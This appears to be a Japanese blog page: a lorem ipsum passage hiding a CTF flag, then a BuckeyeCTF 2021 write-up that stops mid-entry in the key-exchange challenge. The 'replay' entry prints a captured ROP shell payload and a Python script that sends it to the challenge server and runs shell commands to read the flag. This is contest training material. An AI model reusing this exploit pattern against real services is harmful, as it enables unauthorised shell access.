Integer ornare leo in volutpat luctus. Sed vulputate lectus at augue varius, at eleifend odio imperdiet. Proin placerat lobortis odio quis dictum. Praesent elementum arcu ante, nec eleifend massa condimentum vitae. Phasellus elementum tortor in pretium pharetra. Phasellus auctor consectetur rutrum. Aenean laoreet enim mi, quis vestibulum nulla varius eget. In tristique augue et semper sollicitudin. Nullam a condimentum neque. Donec vulputate auctor aliquam. Ut nulla lorem, suscipit vel nisi sed, sodales dignissim augue. Sed sagittis rutrum nulla auctor faucibus. Mauris faucibus justo eget elit euismod, sit amet vulputate dui elementum. Morbi placerat sit amet tortor et accumsan.

Duis ac condimentum lectus, in euismod sapien. Curabitur tincidunt sem arcu, nec bibendum neque fringilla eget. Morbi ut porta justo. Suspendisse sollicitudin et eros id vehicula. Aliquam vitae ipsum ac quam suscipit pretium a mollis risus. Cras quis orci mattis, laoreet quam eu, maximus eros. Vestibulum interdum sapien semper mauris aliquet, elementum viverra mauris mollis. Nullam eget tellus non metus dictum faucibus. Praesent at urna a dolor aliquet finibus. Aenean pretium hendrerit nisl, in lacinia ex congue a. Sed ligula leo, ultrices a mattis eu, cursus quis sem. Integer lacinia nibh at risus lobortis, a dictum augue malesuada.

Cras varius suscipit neque non auctor. Donec pharetra elit non quam vestibulum, ut tempor sem euismod. Aenean tincidunt odio vel sodales ultrices. Aliquam blandit est at varius sollicitudin. Praesent quis turpis et eros consectetur fringilla sit amet non mauris. Mauris suscipit rhoncus risus, non semper lorem porttitor quis. Nam porttitor lectus non tortor bibendum dignissim. Quisque vitae nibh vel justo ullamcorper malesuada ut et mi.

Donec interdum convallis est sit amet faucibus. Duis laoreet mauris in mauris molestie, ut porta ante mollis. Sed in bibendum sapien, ac tempor turpis. Nullam finibus, purus a elementum consequat, risus tortor finibus lacus, id condimentum lectus libero quis justo. Sed hendrerit mi purus, ut ultricies eros bibendum convallis. In consequat purus ipsum, pulvinar vehicula odio consequat sed. Etiam convallis fringilla eros nec gravida.

Donec cursus diam et est suscipit, in mattis arcu rhoncus. Nam cursus leo vel lorem rutrum, eu efficitur magna tristique. Cras ut lobortis arcu. Vestibulum dignissim mi mauris, sed condimentum ipsum mollis eget. Aenean et purus rutrum, rutrum nisi sed, viverra mi. Cras nec sapien non turpis volutpat tincidunt in non ante. Praesent mattis elit id libero fringilla, sit amet dignissim turpis pretium. Fusce et nunc mi. Quisque pretium lobortis diam at consectetur. Morbi vel ultricies justo, vitae interdum nisl. Fusce congue massa quam, eu ullamcorper odio imperdiet ac. Integer sed massa sed justo eleifend volutpat non nec est. Cras lacinia vulputate maximus. Sed luctus pulvinar est ac volutpat. Pellentesque ut nibh sagittis lacus lacinia lobortis.

Donec egestas in nibh a dapibus. Donec lectus est, consequat et sem nec, egestas posuere metus. Vestibulum at neque placerat, hendrerit libero eu, mollis ipsum. Fusce pharetra ex mi, eget auctor felis cursus eu. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Aenean aliquet in est id interdum. Praesent laoreet ac arcu sed porta. Etiam ac feugiat arcu. Donec aliquam ex vel nisi tristique porta.

Nulla ut urna ante. Donec sed odio vitae sem euismod dignissim et consequat mauris. Curabitur volutpat ut velit sit amet imperdiet. Praesent pulvinar urna ut felis lobortis, ac dictum mauris varius. Aenean metus risus, placerat vel dui non, rutrum auctor purus. Nam nisl mauris, eleifend molestie accumsan vel, mattis ac lectus. Proin eleifend arcu ante, nec pretium libero volutpat non. Sed venenatis augue et felis sollicitudin, vel consequat nulla tincidunt. In vitae enim turpis. Aliquam condimentum, purus dapibus auctor cursus, sapien massa dignissim massa, et vulputate velit augue ut felis. Etiam eleifend ornare quam, sit amet laoreet lorem aliquam at. Vivamus leo magna, commodo sit amet orci eu, suscipit efficitur odio. Cras ac tristique urna.

Nullam eu lorem lobortis, ullamcorper ante vitae, tempus sapien. Fusce id placerat nisi, id auctor massa. Etiam id condimentum erat, ac vehicula enim. Nam placerat eu dolor ornare interdum. Mauris nec felis urna. Maecenas eget viverra libero. Nulla suscipit lorem eleifend diam commodo ultricies. Donec eu mollis erat.

Vestibulum lacinia ut nunc ut aliquet. Donec fermentum ultrices magna non pretium. Cras sit amet purus fringilla, dignissim lectus consequat, posuere quam. Vivamus a arcu elit. Sed ac elementum purus. Phasellus diam ipsum, feugiat in vulputate dictum, bibendum sit amet lacus. Sed sit amet rutrum nisi. Duis sit amet nisi lectus. Vestibulum quis egestas justo, laoreet accumsan tellus. Vestibulum erat eros, vulputate nec rutrum non, vestibulum at nunc. Mauris scelerisque vitae diam quis rutrum. Suspendisse venenatis metus facilisis ullamcorper efficitur. Suspendisse tincidunt enim mi, vel mattis ante hendrerit et. Nam scelerisque varius nunc, sit amet tincidunt leo. Praesent sed enim in felis ornare tincidunt posuere vitae ipsum. Donec scelerisque placerat metus.

In euismod, est ut aliquet auctor, nisl metus sollicitudin eros, ut gravida tellus nisi quis dolor. Phasellus non diam fermentum mauris maximus sodales. Vivamus eu venenatis augue, a tempor ante. Quisque orci est, aliquam vitae egestas id, gravida sed metus. Maecenas bibendum, nisi sed euismod porta, mauris dolor rhoncus sapien, sit amet luctus augue magna quis enim. Maecenas sagittis dictum tortor non sodales. Morbi diam lectus, mollis vitae justo vel, venenatis efficitur justo. Vestibulum efficitur eget velit in consectetur. Nunc ac interdum nisl, sit amet pharetra lectus. Aenean suscipit a ipsum eu varius. Praesent tortor urna, lacinia ac ultricies ut, lacinia sed metus. Nam malesuada odio sit amet sollicitudin sagittis. Nulla congue laoreet odio ac dignissim.

Cras lobortis nisl nibh, vitae aliquam eros volutpat in. Nam mattis ligula a ultrices commodo. Duis in diam in nulla tempor sollicitudin feugiat nec diam. Integer vitae blandit massa. Pellentesque tincidunt justo quis turpis ultricies, nec varius est imperdiet. Maecenas feugiat sapien a tellus semper, ut ornare tellus consectetur. Vestibulum pretium pulvinar erat, sed fringilla nisl maximus id. Mauris maximus risus est, sit amet tempus orci sodales ac. Vivamus non arcu et risus lacinia cursus. Etiam congue mi sed enim blandit cursus. Morbi libero ipsum, vestibulum aliquam arcu ac, porttitor molestie felis. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Sed dictum laoreet velit, eu ornare justo luctus sit amet. Nulla venenatis sapien eu sem venenatis, nec ultricies leo venenatis.

Flag: fwopCTF{h1dd3n_1n_7h3_h1570ry_28934}★

Mauris ut felis ac ipsum scelerisque sodales. Nullam nec varius est. Suspendisse mattis urna ut magna ullamcorper, id vestibulum tellus ultricies. Praesent nunc velit, congue in pretium in, auctor a dui. Nulla feugiat convallis orci rutrum dictum. Duis at placerat quam. Nunc porta arcu vel fermentum tempor. Morbi non sapien vitae purus rhoncus rhoncus. Suspendisse faucibus leo sed laoreet ultricies. Pellentesque a eleifend risus, vel blandit eros. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Pellentesque molestie urna et libero efficitur, eget ultrices eros fermentum. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.

Pellentesque mollis, orci et imperdiet congue, magna tortor varius massa, ut faucibus augue elit id velit. Vestibulum suscipit in nunc sit amet pulvinar. Integer pretium, nulla non ornare scelerisque, nibh sapien aliquet nibh, eu posuere elit eros quis tortor. Nunc in fringilla tortor, a sollicitudin lorem. Phasellus et mi a ligula vehicula varius. Nullam vel condimentum dolor. Donec sollicitudin lacinia eros nec consectetur. Praesent vestibulum cursus facilisis. Vestibulum sagittis ac velit nec finibus. Suspendisse potenti. Pellentesque at tempus erat. Quisque a turpis a tellus vehicula ultrices quis ut dui. In molestie lobortis ipsum, eget posuere leo dictum nec.

Proin rhoncus urna massa, sit amet dictum purus tincidunt vitae. Aenean et ligula at risus euismod finibus. Sed dictum nec neque eu lobortis. Fusce tincidunt sodales metus, eu pharetra lorem fringilla consectetur. In tincidunt condimentum tincidunt. Aenean consequat est sit amet odio auctor imperdiet. Pellentesque et dolor ligula. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Aliquam sit amet feugiat dolor. Quisque congue condimentum eleifend. Morbi sed pellentesque nulla. Nullam interdum pellentesque lacinia. Curabitur eget mauris in tortor feugiat porttitor. Sed sit amet erat ac purus vehicula fringilla.

Morbi volutpat eget magna a finibus. Vestibulum eu odio sit amet lorem finibus vehicula. Aenean tempor mattis neque quis aliquet. Vestibulum egestas pulvinar tempus. Donec semper gravida augue a luctus. Suspendisse nec massa ultrices, laoreet odio vel, porta arcu. Aliquam ut nisi et leo maximus volutpat nec vitae turpis. Etiam accumsan sed eros gravida venenatis. In blandit metus eget malesuada lobortis. Nam porta, ligula quis blandit rhoncus, odio orci posuere ante, ut semper risus nulla eget massa. Suspendisse fermentum sit amet ligula nec dapibus. Donec vel volutpat orci, sit amet laoreet purus. Aliquam sagittis risus molestie pharetra pharetra. Nam id finibus lorem. Integer suscipit quis nunc a fringilla.

Sed eu purus aliquam, placerat erat sodales, malesuada turpis. Quisque placerat condimentum arcu vehicula eleifend. Nunc ac dignissim massa. Nam sed nisl nisl. Vestibulum purus nisi, lobortis et velit nec, bibendum interdum mi. Suspendisse vitae gravida lorem. In rutrum consectetur molestie. Donec mollis suscipit ultricies. Nullam in nunc efficitur, laoreet tellus a, dictum arcu. Ut dictum viverra enim, nec hendrerit sapien porttitor sit amet. Nulla dapibus aliquam tortor, vitae fermentum mauris eleifend vel. Vivamus dapibus feugiat augue. In lobortis id quam at bibendum.

Praesent purus eros, laoreet vitae tristique ac, fermentum a ante. Donec sit amet lacinia nisi. Vivamus sit amet sodales velit. Mauris eget sollicitudin risus. Nullam in sapien lacinia, tincidunt nunc quis, ornare lorem. Vestibulum maximus nisl in enim iaculis, at placerat nisl scelerisque. Quisque consectetur velit vitae lectus ornare fermentum. Integer justo augue, mattis vel venenatis luctus, ultrices a leo. Donec id tincidunt diam, vitae hendrerit sem.

Praesent vel ex purus. Nullam convallis augue et turpis tempor feugiat. Cras sed maximus turpis. Fusce tincidunt dapibus mattis. Proin vitae dolor tincidunt, scelerisque est ac, bibendum est. Praesent rhoncus, dui at congue tristique, libero leo semper diam, ut lobortis ipsum risus sed lorem. Vestibulum rhoncus velit purus, eget pretium velit varius nec. Fusce luctus dignissim purus, nec convallis velit porta et.

Morbi rutrum nisl vestibulum tincidunt mollis. Proin volutpat bibendum risus et luctus. Morbi faucibus justo elit, rhoncus ultrices enim egestas et. Proin varius sit amet dolor sit amet semper. Vestibulum in felis ut lectus iaculis ultrices. Morbi molestie vel velit at accumsan. Suspendisse eget felis sed lorem iaculis elementum. Nam et consectetur diam, sit amet blandit lorem.

Duis laoreet leo quis libero varius efficitur. Ut gravida orci non lectus posuere venenatis. Sed dapibus libero sit amet dui eleifend aliquam. Nunc tincidunt tortor eu tincidunt blandit. Nam non blandit dolor, eget suscipit nulla. Mauris gravida iaculis arcu, porta finibus est dictum quis. Sed condimentum scelerisque interdum. Curabitur sed dolor tristique, interdum augue sit amet, iaculis odio. Donec venenatis sodales arcu, at rhoncus sem rhoncus facilisis.

Nunc luctus ante dolor, id consequat erat pretium et. Cras ac orci volutpat, accumsan felis a, sollicitudin arcu. Integer vestibulum gravida orci, non convallis lectus gravida eget. Nulla vitae hendrerit metus. Suspendisse vehicula, ipsum eget finibus fermentum, nisl massa iaculis tellus, a malesuada leo nunc ac mi. Quisque sed libero et metus interdum porttitor. Aliquam elit nulla, rhoncus sit amet tortor eu, aliquet vehicula libero. Donec eu arcu mauris.

Aenean at purus eu purus molestie semper sagittis ut sapien. Donec pharetra ante non ornare vehicula. Vivamus a elit in odio ornare dictum. Pellentesque cursus, nibh vitae finibus mattis, odio justo lacinia eros, dignissim euismod justo ligula vitae neque. Suspendisse sollicitudin neque neque, et dictum velit pulvinar mattis. Suspendisse ornare sit amet orci quis dapibus. Vivamus ut ante ultricies, tincidunt metus ut, imperdiet sem. Suspendisse id justo ante. Nam sollicitudin, nibh et lobortis aliquam, odio est porta magna, hendrerit euismod massa metus ac sem. Etiam tristique turpis quis felis porttitor imperdiet. Nullam at vestibulum felis. Maecenas varius viverra ultricies. Aliquam sollicitudin nibh vel justo molestie, a pharetra magna iaculis. Sed non tincidunt sapien. Duis vel euismod libero.

Morbi nunc sem, placerat pellentesque tempor sed, vulputate et tellus. Duis eleifend et risus vel suscipit. Ut aliquet varius elementum. In et dolor vel quam commodo commodo non bibendum mauris. Cras volutpat mauris dui, vitae egestas massa scelerisque sed. Suspendisse sit amet turpis dignissim, blandit est et, congue nunc. Ut gravida tempor tempor. Cras convallis vulputate ante, a porta elit mollis ut. Nunc a lectus lectus. Aliquam ac viverra nisl. Duis a pellentesque est. Pellentesque tempor sodales gravida. Nam imperdiet mollis nibh, eu maximus libero. Vivamus vehicula egestas imperdiet. Mauris ullamcorper luctus tempor.

Nulla consectetur turpis eu posuere faucibus. Nunc nec ipsum massa. Nam ut iaculis dolor. Aliquam lectus tellus, consectetur varius dapibus ut, semper at augue. Vivamus nec magna nec enim consequat posuere nec sed ante. Cras posuere dignissim massa, nec viverra leo cursus ut. Pellentesque mattis rhoncus dignissim. Cras quis odio congue mauris consequat cursus. Pellentesque gravida elementum congue.

Nulla sollicitudin purus sed tincidunt tristique. Cras in vehicula nunc. Sed a malesuada massa, sed suscipit ipsum. Nulla dolor velit, porta ac leo id, porta pharetra neque. Donec porta orci nec ligula auctor sodales. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Nullam pretium gravida interdum. Proin quis nisl ut lacus dignissim sagittis. Aenean neque ante, blandit nec porttitor in, blandit ac odio. In commodo, dui nec efficitur gravida, nisi leo blandit dolor, ac volutpat elit justo in turpis. Suspendisse aliquet mauris id nibh dictum aliquam.

Curabitur ultrices magna nec ante finibus, vitae condimentum est tempor. Duis pulvinar pharetra felis, vel bibendum enim tincidunt eget. Mauris viverra, augue vel bibendum feugiat, purus libero placerat dolor, quis varius leo odio nec tellus. Etiam nisi sem, facilisis vitae lectus in, volutpat gravida dui. Suspendisse potenti. Aenean sit amet sagittis lacus. Sed ultricies faucibus interdum. Curabitur tortor quam, tristique a commodo id, aliquet sed mi. Mauris malesuada fringilla leo, ut viverra lacus. Mauris nec pharetra nisl. Quisque sit amet metus volutpat, porta lacus nec, posuere velit.

In malesuada hendrerit ligula, vitae consectetur arcu accumsan at. Nulla a bibendum justo. Duis eget suscipit nisl, sit amet varius nibh. Nunc fringilla, dui at dapibus vulputate, sem ante gravida risus, sit amet aliquet justo leo et erat. Ut gravida, arcu quis hendrerit eleifend, erat nisl fringilla ligula, at aliquet dolor enim non eros. Morbi congue, felis vitae vestibulum vehicula, felis odio tincidunt massa, quis lacinia risus mi in nibh. Vestibulum hendrerit imperdiet risus, vel scelerisque nisl elementum nec. Sed efficitur sem vitae consectetur convallis. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Nunc massa nibh, rutrum in sem sit amet, commodo pulvinar ipsum. Nulla pulvinar nibh lorem, nec posuere sapien cursus sed. Etiam rutrum lectus laoreet massa consequat aliquet. Phasellus vel luctus ante, et commodo massa. Nam egestas metus vel velit placerat, commodo eleifend mi mollis. Phasellus rhoncus dignissim diam. Quisque cursus ut ligula sollicitudin cursus.

Aliquam non diam ut nisi luctus suscipit vel sit amet est. Donec id pharetra odio. Curabitur tristique id ante suscipit luctus. Vivamus lobortis dictum ante, dignissim congue diam hendrerit at. Morbi aliquet est at mauris rutrum, varius vehicula urna rhoncus. Integer eu orci sapien. Phasellus sodales dignissim lectus sed varius. Sed varius consequat sapien, vel consectetur dui lobortis quis. Aliquam pharetra tortor id dictum molestie.

Fusce malesuada sagittis velit sed cursus. Donec porttitor lectus a mauris fermentum, vehicula interdum sapien faucibus. Proin sed ligula vel urna placerat vestibulum eget fermentum tellus. Aenean gravida nec quam ac blandit. Fusce dictum, libero id vulputate vestibulum, lectus diam iaculis lorem, et fermentum sem urna sit amet lacus. Praesent sed mi lacinia, laoreet erat sit amet, condimentum nunc. Vivamus feugiat diam tellus, sed mollis nisi vehicula nec. Etiam ultrices viverra tortor quis faucibus. Donec ornare ultrices tortor. Fusce tellus nulla, aliquet sit amet nisl ultricies, aliquet ultrices dolor. Donec nisi velit, facilisis id condimentum ac, aliquam in dolor. Quisque sagittis accumsan finibus.

Nunc nec dui non enim iaculis ornare. Quisque pharetra ipsum ut placerat suscipit. Etiam sapien velit, tempor ut risus a, placerat gravida augue. Nam auctor est quam, in aliquet arcu commodo ut. Duis viverra magna et lorem laoreet rhoncus. Phasellus eu aliquam orci. Cras non elementum velit. Vestibulum congue leo justo, eu varius purus semper convallis.

Pellentesque orci ante, venenatis et ipsum id, viverra bibendum tortor. Vestibulum sed libero at erat dignissim tincidunt tempor non metus. Morbi vel erat cursus, varius leo non, lacinia diam. Fusce sollicitudin urna at tortor rhoncus placerat. Aenean quis ante turpis. Sed quis semper eros. Nullam elementum euismod sem et tempor.

Nulla quis euismod tortor, a laoreet sem. Ut ornare non felis non sodales. Duis ipsum dolor, eleifend quis diam sit amet, ullamcorper dignissim orci. Nullam venenatis id leo quis rhoncus. Proin tincidunt mollis purus non dignissim. Duis sed nulla vitae dolor tempus tempus. Vestibulum justo purus, fermentum in nisi eget, placerat scelerisque tellus. Nam sagittis nisi non metus vestibulum, id feugiat ligula bibendum. Proin gravida quam ligula, sit amet semper mi vulputate sit amet. Praesent diam dolor, blandit at ornare congue, tempus nec neque.

Nulla suscipit nibh iaculis interdum dapibus. Cras non faucibus dolor, eget vehicula quam. Nullam in congue lectus, et ultricies nisl. Sed non dolor porttitor, imperdiet nulla at, auctor erat. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Fusce suscipit nisl ultricies, auctor odio eu, congue tortor. Pellentesque venenatis tortor id porta tempus. Duis lacinia nisl id diam tincidunt, nec iaculis lorem vestibulum. Cras maximus malesuada congue. Mauris at vulputate ipsum. Quisque ac elit semper, pellentesque nisi quis, vehicula mi.

Nam imperdiet urna nisl, sed dictum nunc pharetra vel. Nunc quis euismod ex. Phasellus at mauris scelerisque, vestibulum nisl quis, tincidunt eros. Cras ullamcorper, quam at porttitor consectetur, sapien nulla porttitor est, nec lacinia odio tellus rhoncus ante. Ut eu tortor ac sapien facilisis mattis. Maecenas tincidunt congue sapien. Morbi ultrices sem ligula. Donec eleifend velit diam, non condimentum lectus porta porta.

Mauris pulvinar sapien vitae lorem vehicula auctor. Nunc enim augue, placerat a magna vel, commodo laoreet tortor. Quisque blandit, tellus eu tincidunt accumsan, dolor orci sollicitudin libero, eu ullamcorper lectus felis tincidunt nisi. Nunc consectetur nulla vel enim pulvinar maximus. In ut semper arcu. Curabitur ex sem, feugiat a viverra sed, hendrerit sit amet risus. Integer tristique iaculis tellus, non porta nulla dictum et. In eget augue luctus, mollis ex quis, euismod augue. Nullam mi erat, mollis id porta sit amet, interdum vel odio. Vestibulum molestie, lacus in varius pretium, nisi turpis porttitor lorem, ac bibendum metus tellus in justo. Aenean diam felis, vehicula vel pharetra eu, ultricies in turpis.

Cras maximus dolor neque, id consectetur erat imperdiet lobortis. Etiam ultrices feugiat lorem in ultricies. Phasellus bibendum accumsan blandit. Morbi ac orci id magna ullamcorper eleifend interdum non est. Suspendisse interdum elit et luctus mattis. Aenean rutrum congue turpis eget hendrerit. Morbi finibus condimentum sagittis. Sed elit nunc, tempus euismod tempor et, fermentum sit amet libero. Fusce efficitur egestas massa vel dictum. In hac habitasse platea dictumst. Phasellus porta augue at orci aliquet pellentesque quis in neque.

Duis placerat lectus eget dignissim placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Fusce arcu leo, gravida hendrerit felis id, lobortis venenatis neque. Morbi dui odio, bibendum eu elementum ut, aliquet at metus. Vestibulum tristique, mauris quis viverra egestas, nunc mi auctor eros, in auctor dui nisi id diam. Vestibulum eu ullamcorper urna. Ut mattis eu nisl eu tristique. Etiam id sollicitudin dolor. Interdum et malesuada fames ac ante ipsum primis in faucibus. Quisque eu dignissim nibh. Nulla gravida ultricies neque efficitur consectetur. Donec vel sem dictum, condimentum metus et, ultrices dui. Sed aliquet ligula eu sem congue iaculis. Sed iaculis dolor ac mauris fermentum auctor. Morbi orci massa, finibus nec eros volutpat, blandit aliquet sapien. Donec scelerisque dui sit amet ipsum sollicitudin aliquet.

Suspendisse hendrerit purus sed libero posuere interdum. Aliquam tempor velit dolor, eget porttitor diam luctus eu. Duis sagittis sapien eu neque vulputate iaculis. Nullam nec fringilla turpis. Suspendisse purus mi, euismod non lacus eget, placerat ultrices ex. Curabitur mauris sapien, tincidunt sit amet dapibus vitae, mattis eget lacus. Morbi imperdiet ipsum elit, vitae placerat enim ullamcorper at. Sed condimentum lobortis ligula non tincidunt. Nullam semper arcu arcu, et rhoncus massa suscipit quis. Aenean nec tempus dolor. Maecenas quis purus quis turpis auctor scelerisque eu vitae purus. Etiam dapibus mauris vel ante sollicitudin imperdiet. Praesent a fringilla nisl, vitae bibendum enim.

Aliquam condimentum lacus convallis est auctor finibus. Aliquam et est ut lectus pulvinar cursus at sed nunc. Cras iaculis ultrices orci, et fringilla massa porttitor sed. Mauris id maximus dui, sit amet finibus tellus. Phasellus at interdum metus. Integer in sem magna. Aenean euismod dictum felis ut ultricies. Nunc dictum mi eu ullamcorper ultrices. Integer iaculis nulla venenatis ante aliquet dignissim. Donec a nulla faucibus, placerat odio tincidunt, imperdiet diam. Cras posuere at metus ac viverra.

Proin scelerisque scelerisque elementum. Praesent ut facilisis arcu. Proin congue, erat ut finibus commodo, justo dui luctus ante, eu dignissim metus ligula vitae tortor. Nulla facilisi. Donec vitae mi ligula. Ut dignissim rhoncus dictum. Praesent ornare, lacus a euismod lobortis, arcu tortor mattis diam, sed ullamcorper magna elit non orci. In sagittis massa tellus, varius interdum magna semper nec.

文中にフラグがあった。

fwopCTF{h1dd3n_1n_7h3_h1570ry_28934}

BuckeyeCTF 2021 Writeup

CTF writeup

この大会は2021/10/23 9:00(JST)~2021/10/25 9:00(JST)に開催されました。
今回もチームで参戦。結果は618点で505チーム中92位でした。
自分で解けた問題をWriteupとして書いておきます。

sanity_check (misc 1)

Discordに入り、arcsolstice (Kyle) のプロフィールを見ると、フラグが書いてあった。

buckeye{thX_4_p1ayin9}

replay (misc 30)

WiresharkTCP Streamを見る。

    00000000  48 45 4c 4c 4f 20 48 4f  57 20 41 52 45 20 59 4f   HELLO HO W ARE YO
    00000010  55 20 44 4f 49 4e 47 20  54 4f 44 41 59 0a         U DOING  TODAY.
00000000  61 61 61 61 62 61 61 61  63 61 61 61 64 61 61 61   aaaabaaa caaadaaa
00000010  65 61 61 61 66 61 61 61  67 61 61 61 68 61 61 61   eaaafaaa gaaahaaa
00000020  69 61 61 61 6a 61 61 61  6b 61 61 61 6c 61 61 61   iaaajaaa kaaalaaa
00000030  6d 61 61 61 6e 61 61 61  6f 61 61 61 70 61 61 61   maaanaaa oaaapaaa
00000040  71 61 61 61 72 61 61 61  73 61 61 61 74 61 61 61   qaaaraaa saaataaa
00000050  75 61 61 61 76 61 61 61  77 61 61 61 78 61 61 61   uaaavaaa waaaxaaa
00000060  79 61 61 61 7a 61 61 62  62 61 61 62 63 61 61 62   yaaazaab baabcaab
00000070  64 61 61 62 65 61 61 62  66 61 61 62 67 61 61 62   daabeaab faabgaab
00000080  68 61 61 62 69 61 61 62  55 11 40 00 00 00 00 00   haabiaab U.@.....
00000090  0f 00 00 00 00 00 00 00  57 11 40 00 00 00 00 00   ........ W.@.....
000000A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000100  00 00 00 00 00 00 00 00  04 20 40 00 00 00 00 00   ........ . @.....
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000130  3b 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ;....... ........
00000140  00 00 00 00 00 00 00 00  57 11 40 00 00 00 00 00   ........ W.@.....
00000150  00 00 00 00 00 00 00 00  33 00 00 00 00 00 00 00   ........ 3.......
00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00000190  00 00 00 00 00 00 00 00  0a                        ........ .
00000199  69 64 0a                                           id.
    0000001E  75 69 64 3d 31 30 30 30  20 67 69 64 3d 31 30 30   uid=1000  gid=100
    0000002E  30 20 67 72 6f 75 70 73  3d 31 30 30 30 0a         0 groups =1000.
0000019C  6c 73 20 2d 6c 61 68 0a                            ls -lah. 
    0000003C  74 6f 74 61 6c 20 32 38  4b 0a 64 72 77 78 72 2d   total 28 K.drwxr-
    0000004C  78 72 2d 78 20 31 20 31  30 30 30 20 36 35 35 33   xr-x 1 1 000 6553
    0000005C  34 20 34 2e 30 4b 20 4f  63 74 20 31 39 20 31 34   4 4.0K O ct 19 14
    0000006C  3a 34 38 20 2e 0a 64 72  77 78 72 77 78 2d 2d 2d   :48 ..dr wxrwx---
    0000007C  20 31 20 31 30 30 30 20  36 35 35 33 34 20 34 2e    1 1000  65534 4.
    0000008C  30 4b 20 4f 63 74 20 31  39 20 31 34 3a 34 38 20   0K Oct 1 9 14:48 
    0000009C  2e 2e 0a 2d 72 77 78 72  2d 78 72 2d 78 20 31 20   ...-rwxr -xr-x 1 
    000000AC  31 30 30 30 20 36 35 35  33 34 20 20 31 36 4b 20   1000 655 34  16K 
    000000BC  4f 63 74 20 31 39 20 31  34 3a 34 38 20 63 68 61   Oct 19 1 4:48 cha
    000000CC  6c 6c 0a 2d 72 2d 2d 72  2d 2d 2d 2d 2d 20 31 20   ll.-r--r ----- 1 
    000000DC  31 30 30 30 20 36 35 35  33 34 20 20 20 35 31 20   1000 655 34   51 
    000000EC  4f 63 74 20 31 39 20 31  33 3a 35 38 20 66 6c 61   Oct 19 1 3:58 fla
    000000FC  67 2e 74 78 74 0a                                  g.txt.
000001A4  65 78 69 74 0a                                     exit.

最初の入力データをダウンロードし、同じようにデータを送ってコマンドを実行する。

import socket
import string

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('misc.chall.pwnoh.io', 13371))

data = recvuntil(s, '\n').rstrip()
print data

with open('payload.bin', 'rb') as f:
    payload = f.read()

print payload
s.sendall(payload)

cmd = 'id'
print cmd
s.sendall(cmd + '\n')
data = recvuntil(s, '\n').rstrip()
print data

cmd = 'ls -lah'
print cmd
s.sendall(cmd + '\n')
for _ in range(5):
    data = recvuntil(s, '\n').rstrip()
    print data

cmd = 'cat flag.txt'
print cmd
s.sendall(cmd + '\n')
data = recvuntil(s, '\n').rstrip()
print data

実行結果は以下の通り。

HELLO HOW ARE YOU DOING TODAY
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabU@            W@                                                                                                              @                                     ;                       W@             3                                                       

id
uid=1000 gid=1000 groups=1000
ls -lah
total 28K
drwxr-xr-x 1 1000 65534 4.0K Oct 19 14:37 .
drwxrwx--- 1 1000 65534 4.0K Oct 23 18:55 ..
-rwxr-xr-x 1 1000 65534  16K Oct 19 14:37 chall
-r--r----- 1 1000 65534   51 Oct 19 13:58 flag.txt
cat flag.txt
buckeye{g00d_th1ng_P1E_w4s_d1s4bl3d_0n_th3_b1n4ry}
buckeye{g00d_th1ng_P1E_w4s_d1s4bl3d_0n_th3_b1n4ry}

layers (misc 30)

$ sudo docker pull qxxxb/layers
Using default tag: latest
latest: Pulling from qxxxb/layers
a0d0a0d46f8b: Pull complete 
9a653c77c575: Pull complete 
5b35be6cf17d: Pull complete 
5895c1ac3aab: Pull complete 
Digest: sha256:a89678536727abc0fbfe693b19ac0f8454502351dc792dabbee47bc9ab7420b2
Status: Downloaded newer image for qxxxb/layers:latest
docker.io/qxxxb/layers:latest
$ sudo docker history qxxxb/layers
IMAGE          CREATED       CREATED BY                                      SIZE      COMMENT
0c01a25ae5b7   4 days ago    /bin/sh -c echo "Sorry, the flag has been de…   36B       
<missing>      4 days ago    /bin/sh -c rm flag.png                          0B        
<missing>      4 days ago    /bin/sh -c #(nop) COPY multi:6b3bd56201fda03…   599kB     
<missing>      8 weeks ago   /bin/sh -c #(nop)  CMD ["/bin/sh"]              0B        
<missing>      8 weeks ago   /bin/sh -c #(nop) ADD file:aad4290d27580cc1a…   5.6MB
$ sudo docker save qxxxb/layers > layers.tar

tarを展開して、さらに各フォルダにあるtarを展開してみていく。この結果、c74cc42fc4c046f80c5179802f03e40a40c3f69d22a9ee0ebbe9f7dcd2525467/layer.tarを解凍すると、flag.pngが展開されその画像にフラグが書いてあった。
f:id:satou-y:20211028212139p:plain

buckeye{D0CK3R_H4S_L4Y3RS}

Key exchange (crypto 40)

サーバの処理概要は以下の通り。

・p: 512ビット素数
・g = 5
・p, g表示
・a: 2 以上 p - 1 未満ランダム整数
・A = pow(g, a, p)
・A表示
・B: 入力(1 < B < p - 1)
・shared_secret = pow(B, a, p)
・key = hashlib.sha1(cun.long_to_bytes(shared_secret)).digest()[:16]
